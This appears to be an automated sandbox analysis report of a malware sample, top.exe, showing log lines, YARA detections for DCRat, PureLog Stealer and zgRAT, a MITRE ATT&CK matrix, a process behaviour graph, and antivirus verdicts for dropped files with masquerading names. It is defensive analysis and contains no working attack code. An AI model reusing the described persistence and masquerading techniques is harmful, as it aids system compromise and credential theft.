                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeQueries volume information: C:\msproviderBrokerMonitornet\WinPerfcommon.exe VolumeInformation
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeQueries volume information: C:\msproviderBrokerMonitornet\WinPerfcommon.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0046DF1E
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0045B146 GetVersionExW,0_2_0045B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: WinPerfcommon.exe PID: 1020, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: top.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.WinPerfcommon.exe.6e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000006.00000000.2354556207.00000000006E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2044302589.00000000065FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2045393819.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: top.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.WinPerfcommon.exe.6e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: WinPerfcommon.exe PID: 1020, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: top.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.WinPerfcommon.exe.6e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000006.00000000.2354556207.00000000006E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2044302589.00000000065FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2045393819.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: top.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.WinPerfcommon.exe.6e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts11
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		OS Credential Dumping1
                                    System Time Discovery                                    		1
                                    Taint Shared Content                                    		1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Exploitation for Client Execution                                    		1
                                    DLL Side-Loading                                    		11
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager37
                                    System Information Discovery                                    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Scheduled Task/Job                                    		21
                                    Registry Run Keys / Startup Folder                                    		21
                                    Registry Run Keys / Startup Folder                                    		3
                                    Software Packing                                    		NTDS121
                                    Security Software Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets1
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    File Deletion                                    		Cached Domain Credentials31
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items143
                                    Masquerading                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                                    Virtualization/Sandbox Evasion                                    		Proc Filesystem1
                                    Remote System Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                    Process Injection                                    		/etc/passwd and /etc/shadow1
                                    System Network Configuration Discovery                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1589198 Sample: top.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Antivirus detection for dropped file 2->87 89 13 other signatures 2->89 10 top.exe 3 6 2->10         started        13 wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe 3 2->13         started        16 wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe 2->16         started        18 2 other processes 2->18 process3 file4 73 C:\...\WinPerfcommon.exe, PE32 10->73 dropped 20 wscript.exe 1 10->20         started        103 Antivirus detection for dropped file 13->103 105 Multi AV Scanner detection for dropped file 13->105 107 Machine Learning detection for dropped file 13->107 signatures5 process6 signatures7 91 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->91 93 Suspicious execution chain found 20->93 23 cmd.exe 1 20->23         started        process8 process9 25 WinPerfcommon.exe 12 36 23->25         started        29 conhost.exe 23->29         started        31 Conhost.exe 23->31         started        file10 65 C:\...\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, PE32 25->65 dropped 67 C:\Users\user\Desktop\qMBWbOkw.log, PE32 25->67 dropped 69 C:\Users\user\Desktop\kTYwyifI.log, PE32 25->69 dropped 71 11 other malicious files 25->71 dropped 95 Multi AV Scanner detection for dropped file 25->95 97 Creates an undocumented autostart registry key 25->97 99 Creates multiple autostart registry keys 25->99 101 4 other signatures 25->101 33 cmd.exe 25->33         started        36 csc.exe 4 25->36         started        39 csc.exe 4 25->39         started        41 8 other processes 25->41 signatures11 process12 file13 75 Uses ping.exe to sleep 33->75 77 Uses ping.exe to check the status of other devices and networks 33->77 57 3 other processes 33->57 61 C:\Program Files (x86)\...\msedge.exe, PE32 36->61 dropped 79 Infects executable files (exe, dll, sys, html) 36->79 43 conhost.exe 36->43         started        45 cvtres.exe 1 36->45         started        63 C:\Windows\...\SecurityHealthSystray.exe, PE32 39->63 dropped 47 conhost.exe 39->47         started        49 cvtres.exe 1 39->49         started        81 Loading BitLocker PowerShell Module 41->81 51 conhost.exe 41->51         started        53 conhost.exe 41->53         started        55 conhost.exe 41->55         started        59 3 other processes 41->59 signatures14 process15

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    top.exe57%VirustotalBrowse
                                    top.exe58%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                                    top.exe100%AviraVBS/Runner.VPG
                                    top.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Program Files\MSBuild\Microsoft\SystemSettings.exe100%AviraHEUR/AGEN.1323342
                                    C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe100%AviraHEUR/AGEN.1323342
                                    C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\kTYwyifI.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\Desktop\alFgOGaa.log100%AviraTR/AVI.Agent.updqb
                                    C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\Desktop\Qxaqfufs.log100%AviraTR/AD.BitpyRansom.lcksd
                                    C:\Program Files\MSBuild\Microsoft\SystemSettings.exe100%Joe Sandbox ML
                                    C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe100%Joe Sandbox ML
                                    C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\kTYwyifI.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\SHwrfMKt.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe70%VirustotalBrowse
                                    C:\Program Files\MSBuild\Microsoft\SystemSettings.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\MSBuild\Microsoft\SystemSettings.exe70%VirustotalBrowse
                                    C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe70%VirustotalBrowse
                                    C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\GOHavRZK.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\Qxaqfufs.log33%ReversingLabsWin32.Ransomware.Bitpy
                                    C:\Users\user\Desktop\SHwrfMKt.log9%ReversingLabs
                                    C:\Users\user\Desktop\ZndYtGLf.log25%ReversingLabs
                                    C:\Users\user\Desktop\alFgOGaa.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\kTYwyifI.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\qMBWbOkw.log8%ReversingLabs
                                    C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\msproviderBrokerMonitornet\WinPerfcommon.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    No Antivirus matches

                                    Domains and IPs

                                    Contacted Domains

                                    No contacted domains info

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000026.00000002.3505599922.0000015E10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3617998223.0000016722D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3553159846.0000020C90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3412038875.000001F010073000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/pscore68powershell.exe, 00000026.00000002.2545978060.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105DF21000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
